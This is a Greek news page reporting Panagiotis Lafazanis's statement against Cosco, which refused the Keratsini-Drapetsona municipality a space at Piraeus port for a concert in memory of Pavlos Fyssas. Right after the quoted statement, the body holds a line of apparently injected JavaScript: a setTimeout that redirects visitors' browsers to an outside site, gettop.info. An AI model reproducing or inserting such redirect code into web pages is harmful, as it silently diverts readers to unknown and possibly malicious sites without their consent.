Λαφαζάνης κατά Cosco: Πρόκληση σε βάρος της δημοκρατικής Ελλάδας

0
8

 

Για πρόκληση σε βάρος της δηοκρατικής Ελλάδας κάνει λόγο ο Παναγιώτης Λαφαζάνης αναφερόμενος στο γεγονός ότι η κινεζική Cosco δεν επέτρεψε στον δήμο Κερατσινίου-Δραπετσώνας να διοργανώσει συναυλία στη μνήμη του Παύλου Φύσσα στον χώρο δίπλα στις Πέτρινες Αποθήκες του λιμανιού.

Αναλυτικά η ανακοίνωση του κ. Λαφαζάνη

«Ενώ αυτές τις μέρες, που κλείνουν τρία χρόνια (Κυριακή 18/9) από τη στυγερή δολοφονία του Παύλου Φύσσα από Χρυσαυγίτικα τάγματα εφόδου, ο δημοκρατικός κόσμος τιμά με αγωνιστικές εκδηλώσεις τη μνήμη του Κερατσινιώτη αντιφασίστα, η Κινέζικη Cosco, στην οποία η κυβέρνηση χάρισε με «προίκα» το λιμάνι του Πειραιά, προέβη σε μια μεγάλη πρόκληση σε βάρος της δημοκρατικής Ελλάδας.

Συγκεκριμένα, η Cosco, με απαντητική επιστολή της, δήλωσε την άρνηση να παραχωρήσει την Κυριακή (18/9) στο Δήμο Κερατσινίου- Δραπετσώνας τον χώρο δίπλα στις Πέτρινες Αποθήκες του λιμανιού, προκειμένου να διοργανωθεί συναυλία στη μνήμη του Παύλου Φύσσα, επικαλούμενη, μάλιστα, λόγους «ασφαλείας», κάτι που θα ήταν αδιανόητο να πράξει οποιαδήποτε διοίκηση του δημοσίου στο λιμάνι του Πειραιά.

Η αυταρχική και προκλητική αυτή απόφαση της διοίκηση της Cosco στο λιμάνι του Πειραιά και σε ένα τόσο ευαίσθητο δημοκρατικό θέμα, έρχεται να επιβεβαιώσει τις ανησυχίες που είχαμε εκφράσει για την τύχη του ΟΛΠ στα χέρια της Cosco.

Γίνεται, μάλλον, προφανές ότι η Cosco επιδιώκει να στεγανοποιήσει το λιμάνι του Πειραιά από την Πειραιώτικη κοινωνία, να το μετατρέψει σε Κινέζικο φέουδο και να το θέσει υπό ιδιόμορφη κατοχή, ενώ σε τελευταία ανάλυση στόχος της είναι να μετατρέψει ολόκληρο τον Πειραιά σε Cosco- town και να τον θέσει υπό τον οικονομικό- πολιτικό έλεγχο της.

Η κυβέρνηση φέρνει πελώριες πολιτικές και ποινικές ευθύνες για το σκάνδαλο της εκχώρησης του ΟΛΠ στην Cosco αλλά και ειδικές ευθύνες γιατί τηρεί σιγή ιχθύος για την αυταρχική και προκλητική συμπεριφορά της Cosco απέναντι στο δημοκρατικό αίτημα του Δήμου Κερατσινίου- Δραπετσώνας και για το αντιδημοκρατικό κλείσιμο του λιμανιού.

Ο αυταρχισμός και η κατοχή της Cosco στον Πειραιά δεν θα περάσουν.

Το ιστορικό λιμάνι της χώρας θα αποδοθεί γρήγορα στον λαό με τους αγώνες του». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here